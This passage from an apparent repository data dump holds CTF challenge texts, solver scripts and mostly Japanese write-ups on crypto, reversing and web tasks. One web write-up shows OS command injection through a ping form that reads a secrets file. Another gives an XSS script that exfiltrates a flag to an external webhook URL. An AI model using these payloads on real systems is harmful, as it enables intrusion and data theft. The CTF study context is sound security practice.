CTF challenge is to bring real world phishing attachments to the challengers and attempt to find flags (previously executables or malicious domains) within the macros. This is often a process used in IR teams and becomes an extremely valuable skill. In this challenge we’ve brought to the table a malicious html file, GandCrab/Ursnif sample, and a IceID/Bokbot sample. We’ve rewritten the code to not contain malicious execution however system changes may still occur when executing, also some of the functionalities have been snipped and will likely not expose itself via dynamic analysis.\n\n```\n• Outlook helps, with proper licensing to access necessary features\n ◦ Otherwise oledump or similar would also help but isn’t necessary\n• CyberChef is the ideal tool to use for decoding\n```\n\nPart 1: Start with the HTML file and let’s move our way up, open and or inspect the HTML file provide in the message file. There is only one flag in this document.\n\nThis challenge is brought to you by SRA\n\n[Please_Click_all_the_Things.7z](https://ctf.ritsec.club/files/40447a17c9f327c941206ef0c3adb451/Please_Click_all_the_Things.7z?token=eyJ1c2VyX2lkIjo4NTQsInRlYW1faWQiOjUxMiwiZmlsZV9pZCI6MzV9.YHLarg.UP-rOVR2jIhNepmcdegcthhTifU)" }, { "alpha_fraction": 0.526824951171875, "alphanum_fraction": 0.5444151163101196, "avg_line_length": 20.865385055541992, "blob_id": "e400068dc32238c194175d5fcb20d1a068a0e5b6", "content_id": "2aa5fe4777e51f63ce3062d0ceedff20c56cf702", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 87, "num_lines": 52, "path": "/2021/Google_Capture_The_Flag_2021/FILESTORE/6e5c4cbba595ef1c9d22bfd958dc9144b863081d359a4c27a366c5b8d48b99a26d9b5c4c4bb56db7890b6f188a1ae1b4371d568a22a12e4386d3c0f91dc6c29b/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\ncontext.log_level = 'error'\n\nimport re\nimport string\n\nSTRING = string.digits + string.ascii_letters + string.punctuation\n\nio = remote('filestore.2021.ctfcompetition.com', '1337')\nio.recvuntil('exit\\n')\n\ndef store(data):\n io.sendline('store')\n io.sendline(data)\n io.recvuntil('exit\\n')\n\ndef status():\n io.sendline('status')\n storage = re.search(r'(\\d\\.\\d+)kB/', io.recvuntil('Menu').decode('utf-8')).group(1)\n io.recvuntil('exit\\n')\n return float(storage)\n\npattern = '0134cdfinptuCFMPRT_{}'\n## searching used char in the flag \n# pattern = ''\n# for s in STRING:\n# current = status()\n# store(s)\n# after = status()\n# if current == after:\n# pattern += s\n\nflag = 'CTF'\nwhile True:\n tmp = flag[-1]\n while True:\n for p in pattern:\n current = status()\n store(tmp + p)\n after = status()\n if current == after:\n tmp += p\n print(tmp)\n break\n if len(flag) % 16 == 0 or p == '}':\n break\n flag += tmp[1:]\n if flag[-1] == '}':\n break\nprint(flag)\n\nio.close()\n" }, { "alpha_fraction": 0.7781955003738403, "alphanum_fraction": 0.7932330965995789, "avg_line_length": 58.22222137451172, "blob_id": "b5e2ad87f57dd0c61467b0e6f2fac3d79c4ed1cf", "content_id": "b0b6f82346b94b8139ad441d034fb0a4c4a1dc96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 532, "license_type": "no_license", "max_line_length": 330, "num_lines": 9, "path": "/2021/BCACTF_2.0/Digitally_Encrypted_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Gerald has just learned about this program called Digital which allows him to create circuits. Gerald wants to send messages to his friend, also named Gerald, but doesn't want Gerald (a third one) to know what they are saying. Gerald, therefore, built this encryption circuit to prevent Gerald from reading his messages to Gerald.\n\n[circuit_1.dig](https://objects.bcactf.com/bcactf2/digital1/circuit_1.dig)\n\n[encrypted.txt](https://objects.bcactf.com/bcactf2/digital1/encrypted.txt)\n\nHint 1 of 1\n\nhttps://github.com/hneemann/Digital" }, { "alpha_fraction": 0.32774868607521057, "alphanum_fraction": 0.3832460641860962, "avg_line_length": 29.838708877563477, "blob_id": "4e610ac7b60437e8d4cfd708a048f7e871a3bec1", "content_id": "a884707df513bbca320fef9f9780ccb742b931fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 957, "license_type": "no_license", "max_line_length": 98, "num_lines": 31, "path": "/2020/SunshineCTF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Sunshine CTF\n\n* https://2020.sunshinectf.org/\n\n* 2020/11/07 23:00 JST — 2020/11/09 23:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------------- | -------------------------------------------- | -------------- | ----: | -----: |\n| Reversing | [Hotel Door Puzzle](Hotel_Door_Puzzle) | angr | 100 | |\n| Crypto | [Magically Delicious](Magically_Delicious) | octal | 100 | |\n| Web | [Password Pandemonium](Password_Pandemonium) | javascript | 100 | |\n| Speedrun, pwn | [speedrun-00](speedrun-00) | stack overflow | 10 | |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------------ | ---------------------- | -------------------- | ----: | -----: |\n\n---\n\n## Result\n\n* 313 points\n\n* 143 / 742 (> 1 pt)" }, { "alpha_fraction": 0.7529215216636658, "alphanum_fraction": 0.7562604546546936, "avg_line_length": 15.189188957214355, "blob_id": "da54205e830b98b42464175fbe3f50515215561f", "content_id": "91561108131c2df9b7ce4d9534db1ad9eae3cb6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 757, "license_type": "no_license", "max_line_length": 70, "num_lines": 37, "path": "/2021/UIUCTF_2021/hvhpgs{synt}/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```\n$ ./chal\nenter input with the form: flag_words_with_underscores_and_letters\ngive_me_flag\nincorrect\nenter input with the form: flag_words_with_underscores_and_letters\nflag_words_with_underscores_and_letters\nvery funny\n```\n\nGhidraで解析したところ、\n\n```\nazeupqd_ftq_cgqefuaz_omz_ymotuzqe_ftuzwu_bdabaeq_fa_o\n```\n\nという文字列があり、これをROT14したところ\n\n```\nonsider_the_question_can_machines_thinki_propose_to_c\n```\n\nとなった。\n\n意味が通るようにすると\n\n```\ni_propose_to_consider_the_question_can_machines_think\n```\n\nとなる。これを入力したところフラグが得られた。\n\n<!-- uiuctf{i_propose_to_consider_the_question_can_machines_think} -->\n" }, { "alpha_fraction": 0.7334801554679871, "alphanum_fraction": 0.799559473991394, "avg_line_length": 34, "blob_id": "e63a9e2bccc102523c2401a13aca96fe7fd26e46", "content_id": "2ca4a36340f6dd16ca894eebff920d60d2ce58e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 664, "license_type": "no_license", "max_line_length": 205, "num_lines": 13, "path": "/2020/WaniCTF/ALLIGATOR_01/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ワニ博士のPCでは,悪意のあるプロセスが実行されているみたいです。\n\n取得したメモリダンプから、”evil.exe”が実行された日時を報告してください。\n\n(注意: スペースはすべて半角のアンダースコアにしてください)\n\nexample: FLAG{1234-56-78_99:99:99_UTC+0000}\n\n問題ファイル: [ALLIGATOR.zip](https://mega.nz/file/dHZWkTzA#9a-yHID2Fg_upTaVmYKhO_3-gu7Q0JbLiw-HSfarQyU) (ミラー: [ALLIGATOR.zip](https://drive.google.com/file/d/1yb6Ojbl7xkgRYU-4DgNi-0iJWT6jO2uW/view?usp=sharing))\n\n推奨ツール: [volatility](https://github.com/volatilityfoundation/volatility)\n\nWriter : takushooo" }, { "alpha_fraction": 0.5118483304977417, "alphanum_fraction": 0.5876777172088623, "avg_line_length": 19.14285659790039, "blob_id": "af05edde8d08bd70831c1dfebc1f3be52eb5bdbf", "content_id": "926c6e09b1f12faeac77c8bd2492cc4b546cfe84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 422, "license_type": "no_license", "max_line_length": 47, "num_lines": 21, "path": "/2021/angstromCTF_2021/FREE_FLAGS!!1!!/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ndef solve(b,c):\n a = 1\n b = -b\n x1 = (-b + math.sqrt(b**2-4*a*c))/(2*a)\n x2 = (-b - math.sqrt(b**2-4*a*c))/(2*a)\n return [str(int(x1)), str(int(x2))]\n\nio = remote('shell.actf.co', 21703)\n# 1\nio.recvuntil('What number am I thinking of???')\nio.sendline(str(int(0x7a69)))\n# 2\nio.recvline()\nio.sendline(' '.join(solve(0x476,0x49f59)))\n# 3\nio.recvline()\nio.sendline('banana')\n\nio.interactive()" }, { "alpha_fraction": 0.6175298690795898, "alphanum_fraction": 0.7855245471000671, "avg_line_length": 34.046512603759766, "blob_id": "06d3aa90c35daea43d330bbc0574af0f959b6cc3", "content_id": "bdda7bef6bdbffa8fb2e1ebfd4de7d52e162f916", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 360, "num_lines": 43, "path": "/2020/kksctf_open_2020/bson/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n```json\n{\"task_name\":\"bson\",\"message_pack_data\":\"82a36b65795ca4666c6167dc003137372f27362f6c3203352f033f6c6c30033e292803343d2a6f0325332903282e35393803316f2f2f1c3b39032c3d3f3721\"}\n```\n\n`message_pack_data`の部分を文字列に直してみると、\n\n```\n.£key\\¤flagÜ.177/'6/l2.5/.?ll0.>)(.4=*o.%3).(.598.1o//.;9.,=?7!\n```\n\nとなり、`key`と`flag`という単語が出てくる。\n\nこの後どうすればよいのか分からなかった...\n\n# Solution\n\n**[writeup]**\n\n* https://github.com/r00tstici/writeups/tree/master/kksCTF_2020/bson\n\n`massage_pack_data`の値は、その名の通り`MessagePack`というフォーマットになっている。\n\n* https://msgpack.org/ja.html\n\nこれをデコードすると以下のようになる。\n\n```json\n{\"key\":92,\"flag\":[55,55,47,39,54,47,108,50,3,53,47,3,63,108,108,48,3,62,41,40,3,52,61,42,111,3,37,51,41,3,40,46,53,57,56,3,49,111,47,47,28,59,57,3,44,61,63,55,33]}\n```\n\n* [CyberChef(From Hex, From MessagePack)](https://gchq.github.io/CyberChef/#recipe=From_Hex('Space')From_MessagePack()JSON_Minify()&input=ODJhMzZiNjU3OTVjYTQ2NjZjNjE2N2RjMDAzMTM3MzcyZjI3MzYyZjZjMzIwMzM1MmYwMzNmNmM2YzMwMDMzZTI5MjgwMzM0M2QyYTZmMDMyNTMzMjkwMzI4MmUzNTM5MzgwMzMxNmYyZjJmMWMzYjM5MDMyYzNkM2YzNzIx)\n\n`flag`と`key`とのXORをとるとフラグが得られる。\n\n* [CyberChef(From Decimal, XOR)](https://gchq.github.io/CyberChef/#recipe=From_Decimal('Comma',false)XOR(%7B'option':'Decimal','string':'92'%7D,'Standard',false)&input=NTUsNTUsNDcsMzksNTQsNDcsMTA4LDUwLDMsNTMsNDcsMyw2MywxMDgsMTA4LDQ4LDMsNjIsNDEsNDAsMyw1Miw2MSw0MiwxMTEsMywzNyw1MSw0MSwzLDQwLDQ2LDUzLDU3LDU2LDMsNDksMTExLDQ3LDQ3LDI4LDU5LDU3LDMsNDQsNjEsNjMsNTUsMzM)\n\n# Comment\n\n`key`名がヒントになっていたとは... BSONについて調べまくっていた。" }, { "alpha_fraction": 0.5876120328903198, "alphanum_fraction": 0.7212713956832886, "avg_line_length": 25.12765884399414, "blob_id": "a17165c0a5ff1e7b2da566fc9be4128484458dbd", "content_id": "b61b1c8579ffadd89323c7342d79c45ea936032f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1635, "license_type": "no_license", "max_line_length": 111, "num_lines": 47, "path": "/2020/CyberSecurityRumble2020/Cyberwall/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://chal.cybersecurityrumble.de:3812/ にアクセスする。\n\n![](img/2020-10-31-13-38-21.png)\n\nページのソースを見るとパスワードが直書きされている。\n\n![](img/2020-10-31-13-48-18.png)\n\nPasswordに`rootpw1337`と入力しログイン。\n\nログインに成功した後、左側の[Debugging] メニューからpingを送信できる画面が表示される。試しに`localhost`と入れると結果が返ってくる。\n\n![](img/2020-10-31-14-38-26.png)\n\n`localhost | echo 'Hello'`と入力すると`Hello`と返ってくるのでどうやらコマンドインジェクションが通用しそうだと推測。\n\n* [タイガーチームサービス/DEF CON CTF Qualsにチャレンジ!](https://www.tiger1997.jp/report/activity/securityreport_20140523.html)\n\n * pingでのOSコマンドインジェクション(類似問題)\n\n![](img/2020-10-31-14-43-39.png)\n\n`ls -la` でカレントディレクトリにあるファイルを調べる。\n\n```bash\nlocalhost | ls -la\n\ntotal 32\ndrwxr-xr-x 1 root root 4096 Oct 30 18:39 .\ndrwxr-xr-x 1 root root 4096 Oct 30 18:35 ..\n-rw-r--r-- 1 root root 16 Oct 15 12:49 requirements.txt\ndrwxr-xr-x 3 root root 4096 Oct 15 12:49 static\n-rw-r--r-- 1 root root 85 Oct 15 12:49 super_secret_data.txt\ndrwxr-xr-x 2 root root 4096 Oct 15 12:49 templates\n-rw-r--r-- 1 root root 1070 Oct 15 12:49 webapp.py\n-rw-r--r-- 1 root root 23 Oct 15 12:49 wsgi.py\n```\n\n`super_secret_data.txt`の中身を`cat`で見る。\n\n```bash\nlocalhost | cat super_secret_data.txt\n```\n\n<!-- CSR{oh_damnit_should_have_banned_curl_https://news.ycombinator.com/item?id=19507225} -->" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.625, "avg_line_length": 21.399999618530273, "blob_id": "e6f0e9c2add358ad84ea391792aa40a76a7887fc", "content_id": "4cd1b87328accaa72451f6ab5b857080adec5f8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 59, "num_lines": 10, "path": "/2021/WaniCTF21-spring/illegal_image/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\nfrom scapy.all import rdpcap\n\npcap = rdpcap(os.path.dirname(__file__)+'/icmp.pcap')\n\ndata = [p.load for p in pcap]\n\nwith open(os.path.dirname(__file__)+'/flag.jpg','wb') as f:\n for d in data:\n f.write(d)\n" }, { "alpha_fraction": 0.7068965435028076, "alphanum_fraction": 0.7586206793785095, "avg_line_length": 10.800000190734863, "blob_id": "c304f6f2568b07ee6f6e6e14635b6520e57fb1a3", "content_id": "165f49be4b8761df7d4da554501006187600fd59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 78, "license_type": "no_license", "max_line_length": 28, "num_lines": 5, "path": "/2021/WaniCTF21-spring/fake/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "偽物を見破れますか?\n\nhttps://fake.web.wanictf.org\n\nWriter : hi120ki" }, { "alpha_fraction": 0.5853080749511719, "alphanum_fraction": 0.7132701277732849, "avg_line_length": 20.149999618530273, "blob_id": "52877a3915af42e5de28caa886be060a241443ff", "content_id": "355e88971e9d2718f2d6315dfd7307e9c6adbacc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 482, "license_type": "no_license", "max_line_length": 119, "num_lines": 20, "path": "/2021/DiceCTF_2021/babymix/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n添付の`babymix`を実行するとパスワードが求められる。\n\n```\nWith our propietary babymix™ technology, we assure you that this password cannot be stolen, modified, or tampered with!\n\nPlease enter your admin password: aaa\n\nIncorrect :(\n```\n\nangr を使って調べる。\n\n```\n$ python solver.py\nb'm1x_it_4ll_t0geth3r!1!\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00 @\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n```\n\n<!-- dice{m1x_it_4ll_t0geth3r!1!} -->" }, { "alpha_fraction": 0.7515923380851746, "alphanum_fraction": 0.7515923380851746, "avg_line_length": 18.625, "blob_id": "571b7515144beeaa6134ff1e6eeb7602c9f3794a", "content_id": "9d088c32bbfba4e2a6ce86d09a0c254c94865e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 157, "license_type": "no_license", "max_line_length": 92, "num_lines": 8, "path": "/2021/HeroCTF_v3/Atoms/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Dmitri sends us this message, will you be able to retrieve the secret message hidden inside?\n\n```\nMtMdDsFmMdHsMdMdUuo\n```\n\nFormat : Hero{}\nAuthor : xanhacks\n" }, { "alpha_fraction": 0.7578475475311279, "alphanum_fraction": 0.7645739912986755, "avg_line_length": 62.85714340209961, "blob_id": "b2ea04338cf543751d4ddd3af2a3078cff9b27cf", "content_id": "74fb8155dbcc61390470888524555d7c5909473b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 446, "license_type": "no_license", "max_line_length": 264, "num_lines": 7, "path": "/2021/BCACTF_2.0/Geralds_New_Job/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Being a secret agent didn't exactly work out for Gerald. He's been training to become a translator for dinosaurs going on vacation, and he just got his traslator's licence. But when he sees it, it doesn't seem to belong to him... can you help him find his licence?\n\n[gerald.pdf](https://objects.bcactf.com/bcactf2/polyglot/gerald.pdf)\n\nHint 1 of 1\n\nGerald had to know a lot of languages to become a translator. He knows there's a word for that..." }, { "alpha_fraction": 0.6036961078643799, "alphanum_fraction": 0.7351129651069641, "avg_line_length": 21.136363983154297, "blob_id": "aa490307ceb33727f887e615b878f1d20698f79d", "content_id": "ba7f6bd972a56acc6443eb70a618b0ce6b376d47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 619, "license_type": "no_license", "max_line_length": 216, "num_lines": 22, "path": "/2021/redpwnCTF_2021/wstrings/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file wstrings\nwstrings: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=97d891ccc43a726635b32182876bf7e39fccd8ce, not stripped\n```\n\n実行してみるとフラグの入力を求められる。\n\n```bash\n$ ./wstrings\nWelcome to flag checker 1.0.\nGive me a flag> hoge\n```\n\nGhidraで解析してみると、フラグ文字列と直接比較している部分が見つかった。\n\n![](img/2021-07-10-15-13-50.png)\n\n<!-- flag{n0t_al1_str1ngs_ar3_sk1nny} -->\n" }, { "alpha_fraction": 0.7554240822792053, "alphanum_fraction": 0.7751479148864746, "avg_line_length": 38.07692337036133, "blob_id": "6e0010edfc9a74cb403066ceafab6bfd2e621f13", "content_id": "0211aa61d5461a59e407c09c19124d4feb5041c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 507, "license_type": "no_license", "max_line_length": 194, "num_lines": 13, "path": "/2021/BCACTF_2.0/RSAtrix_2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Sure, you saw our first prototype, but you could obviously see it was just RSA slapped on a permutation matrix. Will you still be able to decode our messages if we conjugate our generator first?\n\n[rt2.sage](https://objects.bcactf.com/bcactf2/rsatrix-2/rt2.sage)\n\n[enc.txt](https://objects.bcactf.com/bcactf2/rsatrix-2/enc.txt)\n\nHint 1 of 2\n\nWhat do you know about elements of the encoded matrix?\n\nHint 2 of 2\n\nHere, \"conjugating a matrix\" means performing a similarity transformation (for ease of googling)." }, { "alpha_fraction": 0.7752442955970764, "alphanum_fraction": 0.8143322467803955, "avg_line_length": 18.1875, "blob_id": "fbf379a66f1ff87f18c0fdeb3f02115a9a705e82", "content_id": "781896e67dd3ce385d960202704805b477a5813e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 559, "license_type": "no_license", "max_line_length": 101, "num_lines": 16, "path": "/2021/WaniCTF21-spring/licence/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "このプログラムは非常に強力なライセンス確認処理が実装されています。\n\nただ、今持っているライセンスファイルは間違っているようです。\n\n正しいライセンスファイルを見つけて頂けますか?\n\n```\n$ ./licence key.dat\nFailed to activate.\n```\n\n複雑な処理をシンボリック実行で解析してくれるツール「angr」を使えば簡単に解けるかも。\n\n[rev-licence.zip](https://score.wanictf.org/storage/b374pl6ue0jriessvqyaje39m0ejwx8d/rev-licence.zip)\n\nWriter : hi120ki\n" }, { "alpha_fraction": 0.5663082599639893, "alphanum_fraction": 0.6272401213645935, "avg_line_length": 16.4375, "blob_id": "c6bba795a3372dc9bb6a652f66de41fe1d291998", "content_id": "207a4d006698be3a89025004d46d716331bd42f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 279, "license_type": "no_license", "max_line_length": 42, "num_lines": 16, "path": "/2021/SECCON_Beginners_CTF_2021/simple_RSA/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom flag import flag\n\nflag = bytes_to_long(flag.encode(\"utf-8\"))\n\np = getPrime(1024)\nq = getPrime(1024)\nn = p * q\ne = 3\n\nassert 2046 < n.bit_length()\nassert 375 == flag.bit_length()\n\nprint(\"n =\", n)\nprint(\"e =\", e)\nprint(\"c =\", pow(flag, e, n))\n" }, { "alpha_fraction": 0.4229508340358734, "alphanum_fraction": 0.6149882674217224, "avg_line_length": 24.41666603088379, "blob_id": "55c13e40c66c98b621c29d31bb0c8abdd7cef310", "content_id": "d04a4a031975afc26465f70cec6bba24b8a35936", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2369, "license_type": "no_license", "max_line_length": 246, "num_lines": 84, "path": "/2021/RaRCTF_2021/verybabyrev/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ ./verybabyrev\nEnter your flag: hoge\nNope!\n```\n\n正しいフラグが入力できればよさそうなので、Ghidraで解析する。\n\n```c\n local_108 = 0x45481d1217111313;\n local_100 = 0x95f422c260b4145;\n local_f8 = 0x541b56563d6c5f0b;\n local_f0 = 0x585c0b3c2945415f;\n local_e8 = 0x402a6c54095d5f00;\n local_e0 = 0x4b5f4248276a0606;\n local_d8 = 0x6c5e5d432c2d4256;\n local_d0 = 0x6b315e434707412d;\n local_c8 = 0x5e54491c6e3b0a5a;\n local_c0 = 0x2828475e05342b1a;\n local_b8 = 0x60450073b26111f;\n local_b0 = 0xa774803050b0d04;\n local_a8 = 0;\n printf(\"Enter your flag: \");\n fgets((char *)&local_98,0x80,stdin);\n local_c = 0;\n if ((char)local_98 != 'r') {\n puts(\"Nope!\");\n /* WARNING: Subroutine does not return */\n exit(0);\n }\n while (local_c < 0x7f) {\n *(byte *)((long)&local_98 + (long)local_c) =\n *(byte *)((long)&local_98 + (long)local_c) ^\n *(byte *)((long)&local_98 + (long)(local_c + 1));\n local_c = local_c + 1;\n }\n iVar1 = memcmp(&local_108,&local_98,0x61);\n if (iVar1 == 0) {\n puts(\"Correct!\");\n /* WARNING: Subroutine does not return */\n exit(1);\n }\n puts(\"Nope!\");\n /* WARNING: Subroutine does not return */\n exit(0);\n```\n\n入力したフラグ`local_98`は\n\n* 1文字目が`r`である\n\n* `n`文字目と`n+1`文字目をXORした結果が、`local_108`以降のデータ列と一致する\n\nという条件を満たすので、そのようなフラグを見つけるプログラムを作成する。\n\n```py\nfrom Crypto.Util.number import *\nimport string\n\nCHARS = string.printable\n\nlocals = [0x45481d1217111313, 0x95f422c260b4145, 0x541b56563d6c5f0b, 0x585c0b3c2945415f, 0x402a6c54095d5f00, 0x4b5f4248276a0606, 0x6c5e5d432c2d4256, 0x6b315e434707412d, 0x5e54491c6e3b0a5a, 0x2828475e05342b1a, 0x60450073b26111f, 0xa774803050b0d04]\nlocals = [ long_to_bytes(l)[::-1] for l in locals]\n\nflag = 'r'\nidx = 0\n\nfor local in locals:\n for l in local:\n for c in CHARS:\n if ord(flag[idx]) ^ ord(c) == l:\n flag += c\n idx += 1\n if c == '}':\n print(flag)\n exit(0)\n break\n```\n\n<!-- rarctf{3v3ry_s1ngl3_b4by-r3v_ch4ll3ng3_u535_x0r-f0r_s0m3_r34s0n_4nd_1-d0nt_kn0w_why_dc37158365} -->\n" }, { "alpha_fraction": 0.8073394298553467, "alphanum_fraction": 0.8073394298553467, "avg_line_length": 30.285715103149414, "blob_id": "41661d11e1c9babbc6a0de835029e617e5091eb0", "content_id": "f880dfed321e4222715f4329e33e6f769753a82b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 237, "license_type": "no_license", "max_line_length": 93, "num_lines": 7, "path": "/2020/WaniCTF/exclusive/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "XORを使った暗号です🔐\n\n* [encript.py](https://score.wanictf.org/storage/jkbbjmmvkvidvkcvbowmxwawxcsxbumd/encrypt.py)\n\n* [output.txt](https://score.wanictf.org/storage/tukcerbgugwzbtznbhblpokjvcqzsoqt/output.txt)\n\nWriter : Laika" }, { "alpha_fraction": 0.5584239363670349, "alphanum_fraction": 0.6698369383811951, "avg_line_length": 15.355555534362793, "blob_id": "94a7f42687a37f051a255f131dc532e505168a3a", "content_id": "3cc916a5cdab3da5c8be99405f05c732b2343859", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1010, "license_type": "no_license", "max_line_length": 74, "num_lines": 45, "path": "/2021/Zh3r0_CTF_V2/bxxs/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n* http://web.zh3r0.cf:3333/feedback\n\n上記のページにアクセスする。\n\n![](img/2021-06-06-00-44-18.png)\n\n問題タイトルが`bxss`ということで、XSSを試してみる。\n\n```js\n<script>window.onload(webhookのURL);</script>\n```\n\nと入力すると、サーバーサイドでURLにアクセスしていることが分かった。\n\nまた、 \n\n* http://web.zh3r0.cf:3333/flag\n\nにアクセスすると、`Not Found`ではなく\n\n![](img/2021-06-06-00-46-50.png)\n\nと表示されることから、ローカルの`flag`を読み出せばよいことが分かる。\n\n以下のコードをFormに入力するとフラグが得られる。\n\n```js\n<script>\nvar uri = \"https://webhook.site/d709442c-232a-41d2-929d-2371e1f4d0cf/?q=\";\ntry {\n var xhr = new XMLHttpRequest();\n xhr.open('GET', 'flag', false);\n xhr.send(null);\n window.open(uri+xhr.responseText);\n} catch (e){\n window.open(uri+e);\n}\n</script>\n```\n\n![](img/2021-06-06-00-43-31.png)\n\n<!-- zh3r0{{Ea5y_bx55_ri8}} -->\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.8376068472862244, "avg_line_length": 32.42856979370117, "blob_id": "6ac625cb09aa29189ac960acd8924527d3aaac73", "content_id": "537840961d0b3a7370e54dfd9a38f2bf29bb2b0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 234, "license_type": "no_license", "max_line_length": 123, "num_lines": 7, "path": "/2021/redpwnCTF_2021/scissor/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "I was given this string and told something about scissors.\n\n`egddagzp_ftue_rxms_iuft_rxms_radymf`\n\nDownloads\n\n[encrypt.py](https://static.redpwn.net/uploads/44dbfcfa8c7590e5afc686ce9d608ddf886c41ef1eee8b86a860af011dc26d73/encrypt.py)\n" }, { "alpha_fraction": 0.6526315808296204, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 26.14285659790039, "blob_id": "2f1d748b3cfda42f9c9397d8240cd3d5ab1f4847", "content_id": "4088de3c021785c3fa28e5bd096ebd63852ea3bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 190, "license_type": "no_license", "max_line_length": 89, "num_lines": 7, "path": "/2021/dCTF_2021/Bell/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Blaise's friends like triangles too!\n\n```\nnc dctf-chall-bell.westeurope.azurecontainer.io 5311\n```\n\n[bell](https://dctf.dragonsec.si/files/98bb654ba9c90d0704d5286d2fdb357b/bell?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTc4fQ.YJ-k_Q.kKR6h04g3GCM6Bt89vzBUz0R_d4)\n" }, { "alpha_fraction": 0.6349206566810608, "alphanum_fraction": 0.8015872836112976, "avg_line_length": 41, "blob_id": "e5a8e049af93c874e887dead354f823b06e134cc", "content_id": "cfa68894d58ebbf7830d5244922fdcf42eb1f01f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 126, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/2021/dCTF_2021/Dragon/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Hiding in plain sight.\n\n[dragon.png](https://dctf.dragonsec.si/files/10c2091a994393f34b03c41ab4c66cbf/dragon.png?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTAwfQ.YJ9Bww.KQykU5j6RKfzVbvXVwMvvSd5jdM)\n" }, { "alpha_fraction": 0.5272727012634277, "alphanum_fraction": 0.7350649237632751, "avg_line_length": 28.69230842590332, "blob_id": "a823f66f0f570fdbe90b0f395afd4fe231f79c3a", "content_id": "e694720b43a2e602ab9c9a71535c6e7fd5ed3b9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 385, "license_type": "no_license", "max_line_length": 109, "num_lines": 13, "path": 